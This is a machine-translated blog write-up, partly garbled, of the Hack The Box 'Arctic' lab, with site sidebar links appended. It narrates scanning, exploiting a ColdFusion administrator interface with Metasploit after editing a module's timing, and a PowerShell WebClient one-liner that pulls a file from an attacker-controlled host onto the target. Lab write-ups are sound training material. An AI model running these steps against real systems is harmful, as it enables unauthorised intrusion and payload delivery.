当前位置:网站首页>HTB-Arctic
HTB-Arctic
2022-07-25 05:41:00 【It's always late at night.】

HTB-Arctic
information gathering
after nmap After scanning, only the following information was found .

And there is one of these ports fmtp The service is a little different , Go to the browser and have a look , Loading is a little slow .
stay CFIDE I saw Administrator file .
After loading ColdFusion Login interface .
So much information has been collected so far .
Turn it on
Go first exploit-db have a look

Go again msf have a look 
Try two first excellent Of , The first upload failed for unknown reasons , It is speculated that the delay problem may lead to the failure , After modifying the time, it still fails , For a .
This one is also a failure , Consider delay , Go to source code modification delay .

Take these two 5 Change it a little bit .

After modifying and saving, return to msf, Execute first reload heavy load payload, Run again .
When you want to raise the right, you find that this task cannot be switched to the background , Then collect some information and make a pedal .
First find CFIDE The position of , See at a glance wwwroot, Then generate …… Why don't I directly generate .exe Well , All the wwwroot Just accept it here .
powershell "(new-object System.Net.WebClient).Downloadfile('http://IP/ file name ', ' file name ')"

Gained a rebound shell After use suggester An error will appear saying that the user has interrupted , However, I did nothing .
Doubt may be this rebound shell yes 32 The goal is 64 position , in !
64 It's the same with you , I still have no operation , It also reports an error that the user interrupted the operation , All right .
I can only ask for strategies .( Please forgive the blogger for being too stupid , I don't know the solution )

边栏推荐
- Single sign on (one sign on, available everywhere)
- The computer accesses the Internet normally with the same network cable, and the mobile phone connects to WiFi successfully, but it cannot access the Internet
- 对于von Mises distribution(冯·米塞斯分布)的一点心得
- Get URL of [url reference]? For the following parameters, there are two ways to get the value of the corresponding parameter name and convert the full quantity to the object structure
- y76.第四章 Prometheus大厂监控体系及实战 -- prometheus进阶(七)
- Talk about how redis handles requests
- typora+PicGo+阿里云OSS 搭建以及报错解决【转载】
- 动态规划学习笔记
- Three billion dollars! Horizon becomes the world's highest valued AI chip Unicorn
- 新时代生产力工具——FlowUs 息流全方位评测
猜你喜欢

Leetcode 204. count prime numbers (wonderful)

idea常用10个快捷键

同条网线电脑正常上网,手机连接wifi成功,但是无法访问互联网

50 places are limited to open | with the news of oceanbase's annual press conference coming!

求求你别再用 System.currentTimeMillis() 统计代码耗时了,真的太 Low 了!

ThreadLocal

Why is it that all the games are pseudorandom and can't make true random?

Programming hodgepodge (II)

Sword finger offer 05. replace spaces

Linear algebra (3)
随机推荐
Openfegin remote call lost request header problem
background
MATLAB作图实例:5:双轴图
2021年ICPC陕西省赛热身赛 B.CODE(位运算)
SystemVerilog中interface(接口)介绍
R language obtains the data row where the nth maximum value of the specified data column is located in the data.table data
The difference between function and task in SystemVerilog
Talk about how redis handles requests
微服务 - 远程调用(Feign组件)
求求你别再用 System.currentTimeMillis() 统计代码耗时了,真的太 Low 了!
C100: smallest hevc visual IOT MCU
Base64 (conversion between string and Base64 string)
Summary of common attributes of flex layout
编程大杂烩(二)
For data security reasons, the Dutch Ministry of Education asked schools to suspend the use of Chrome browser
聊聊 Redis 是如何进行请求处理
R language uses wilcox.test function to perform Wilcox signed rank test to obtain confidence interval of population median (set conf.level parameter to specify confidence level and size of confidence
Airserver 7.3.0 Chinese version mobile device wireless transmission computer screen tool
JWT(json web token)
VPP cannot load up status interface